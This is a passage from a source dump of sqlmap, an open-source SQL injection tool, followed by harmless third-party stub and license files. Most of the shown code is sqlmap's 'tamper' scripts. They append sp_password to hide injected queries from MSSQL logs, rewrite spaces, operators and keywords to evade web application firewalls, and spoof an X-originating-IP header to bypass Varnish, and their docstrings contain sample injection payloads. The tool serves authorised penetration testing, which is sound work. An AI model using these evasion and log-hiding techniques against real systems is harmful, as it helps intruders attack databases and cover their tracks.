4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.HIGH
11 |
12 | def tamper(payload, **kwargs):
13 | """
14 | Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
15 |
16 | Requirement:
17 | * MSSQL
18 |
19 | Notes:
20 | * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
21 | * Reference: http://websec.ca/kb/sql_injection
22 |
23 | >>> tamper('1 AND 9227=9227-- ')
24 | '1 AND 9227=9227-- sp_password'
25 | """
26 |
27 | retVal = ""
28 |
29 | if payload:
30 | retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
31 |
32 | return retVal
33 |
--------------------------------------------------------------------------------
/tamper/space2mssqlhash.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.compat import xrange
9 | from lib.core.enums import PRIORITY
10 |
11 | __priority__ = PRIORITY.LOW
12 |
13 | def tamper(payload, **kwargs):
14 | """
15 | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
16 |
17 | Requirement:
18 | * MSSQL
19 | * MySQL
20 |
21 | Notes:
22 | * Useful to bypass several web application firewalls
23 |
24 | >>> tamper('1 AND 9227=9227')
25 | '1%23%0AAND%23%0A9227=9227'
26 | """
27 |
28 | retVal = ""
29 |
30 | if payload:
31 | for i in xrange(len(payload)):
32 | if payload[i].isspace():
33 | retVal += "%23%0A"
34 | elif payload[i] == '#' or payload[i:i + 3] == '-- ':
35 | retVal += payload[i:]
36 | break
37 | else:
38 | retVal += payload[i]
39 |
40 | return retVal
41 |
--------------------------------------------------------------------------------
/tamper/symboliclogical.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.LOWEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
20 |
21 | >>> tamper("1 AND '1'='1")
22 | "1 %26%26 '1'='1"
23 | """
24 |
25 | retVal = payload
26 |
27 | if payload:
28 | retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
29 |
30 | return retVal
31 |
--------------------------------------------------------------------------------
/tamper/unionalltounion.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.HIGHEST
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
18 |
19 | >>> tamper('-1 UNION ALL SELECT')
20 | '-1 UNION SELECT'
21 | """
22 |
23 | return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload
24 |
--------------------------------------------------------------------------------
/tamper/uppercase.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.data import kb
11 | from lib.core.enums import PRIORITY
12 |
13 | __priority__ = PRIORITY.NORMAL
14 |
15 | def dependencies():
16 | pass
17 |
18 | def tamper(payload, **kwargs):
19 | """
20 | Replaces each keyword character with upper case value (e.g. select -> SELECT)
21 |
22 | Tested against:
23 | * Microsoft SQL Server 2005
24 | * MySQL 4, 5.0 and 5.5
25 | * Oracle 10g
26 | * PostgreSQL 8.3, 8.4, 9.0
27 |
28 | Notes:
29 | * Useful to bypass very weak and bespoke web application firewalls
30 | that has poorly written permissive regular expressions
31 | * This tamper script should work against all (?) databases
32 |
33 | >>> tamper('insert')
34 | 'INSERT'
35 | """
36 |
37 | retVal = payload
38 |
39 | if payload:
40 | for match in re.finditer(r"[A-Za-z_]+", retVal):
41 | word = match.group()
42 |
43 | if word.upper() in kb.keywords:
44 | retVal = retVal.replace(word, word.upper())
45 |
46 | return retVal
47 |
--------------------------------------------------------------------------------
/tamper/varnish.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.NORMAL
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall
18 |
19 | Reference:
20 | * https://web.archive.org/web/20160815052159/http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
21 |
22 | Notes:
23 | Examples:
24 | >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
25 | >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
26 | >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
27 | >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
28 | >> X-remote-IP: * or %00 or %0A
29 | """
30 |
31 | headers = kwargs.get("headers", {})
32 | headers["X-originating-IP"] = "127.0.0.1"
33 | return payload
34 |
--------------------------------------------------------------------------------
/thirdparty/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/__init__.py
--------------------------------------------------------------------------------
/thirdparty/ansistrm/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/ansistrm/__init__.py
--------------------------------------------------------------------------------
/thirdparty/bottle/__init__.py:
--------------------------------------------------------------------------------
1 | pass
2 |
--------------------------------------------------------------------------------
/thirdparty/chardet/compat.py:
--------------------------------------------------------------------------------
1 | ######################## BEGIN LICENSE BLOCK ########################
2 | # Contributor(s):
3 | # Dan Blanchard
4 | # Ian Cordasco
5 | #
6 | # This library is free software; you can redistribute it and/or
7 | # modify it under the terms of the GNU Lesser General Public
8 | # License as published by the Free Software Foundation; either
9 | # version 2.1 of the License, or (at your option) any later version.
10 | #
11 | # This library is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
14 | # Lesser General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU Lesser General Public
17 | # License along with this library; if not, write to the Free Software
18 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
19 | # 02110-1301 USA
20 | ######################### END LICENSE BLOCK #########################
21 |
22 | import sys
23 |
24 |
25 | if sys.version_info < (3, 0):
26 | PY2 = True
27 | PY3 = False
28 | base_str = (str, unicode)
29 | text_type = unicode
30 | else:
31 | PY2 = False
32 | PY3 = True
33 | base_str = (bytes, str)
34 | text_type = str
35 |
--------------------------------------------------------------------------------
/thirdparty/chardet/version.py:
--------------------------------------------------------------------------------
1 | """
2 | This module exists only to simplify retrieving the version number of chardet
3 | from within setup.py and from chardet subpackages.
4 |
5 | :author: Dan Blanchard (dan.blanchard@gmail.com)
6 | """
7 |
8 | __version__ = "3.0.4"
9 | VERSION = __version__.split('.')
10 |
--------------------------------------------------------------------------------
/thirdparty/clientform/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/clientform/__init__.py
--------------------------------------------------------------------------------
/thirdparty/colorama/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
2 | from .initialise import init, deinit, reinit, colorama_text
3 | from .ansi import Fore, Back, Style, Cursor
4 | from .ansitowin32 import AnsiToWin32
5 |
6 | __version__ = '0.3.7'
7 |
8 |
--------------------------------------------------------------------------------
/thirdparty/identywaf/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019-2020 Miroslav Stampar
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/thirdparty/identywaf/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # Copyright (c) 2019-2021 Miroslav Stampar (@stamparm), MIT
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # The above copyright notice and this permission notice shall be included in
7 | # all copies or substantial portions of the Software.
8 |
9 | pass
10 |
--------------------------------------------------------------------------------
/thirdparty/keepalive/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # Copyright 2002-2003 Michael D. Stenner
4 | #
5 | # This program is free software: you can redistribute it and/or modify it
6 | # under the terms of the GNU Lesser General Public License as published
7 | # by the Free Software Foundation, either version 3 of the License, or
8 | # (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | # GNU Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program. If not, see .
17 | #
18 |
19 | pass
20 |
--------------------------------------------------------------------------------
/thirdparty/magic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/magic/__init__.py
--------------------------------------------------------------------------------
/thirdparty/multipart/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/multipart/__init__.py
--------------------------------------------------------------------------------
/thirdparty/odict/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import sys
4 |
5 | if sys.version_info[:2] >= (2, 7):
6 | from collections import OrderedDict
7 | else:
8 | from ordereddict import OrderedDict
9 |
--------------------------------------------------------------------------------
/thirdparty/pydes/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # Copyright 2009 Todd Whiteman
4 | #
5 | # This program is free software: you can redistribute it and/or modify it
6 | # under the terms of the GNU Lesser General Public License as published
7 | # by the Free Software Foundation, either version 3 of the License, or
8 | # (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | # GNU Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program. If not, see .
17 | #
18 |
19 | pass
20 |
--------------------------------------------------------------------------------
/thirdparty/socks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/socks/__init__.py
--------------------------------------------------------------------------------
/thirdparty/termcolor/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/thirdparty/termcolor/__init__.py
--------------------------------------------------------------------------------
/thirdparty/wininetpton/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # Copyright Ryan Vennell
4 | #
5 | # This software released into the public domain. Anyone is free to copy,
6 | # modify, publish, use, compile, sell, or distribute this software,
7 | # either in source code form or as a compiled binary, for any purpose,
8 | # commercial or non-commercial, and by any means.
9 |
10 | pass
11 |
--------------------------------------------------------------------------------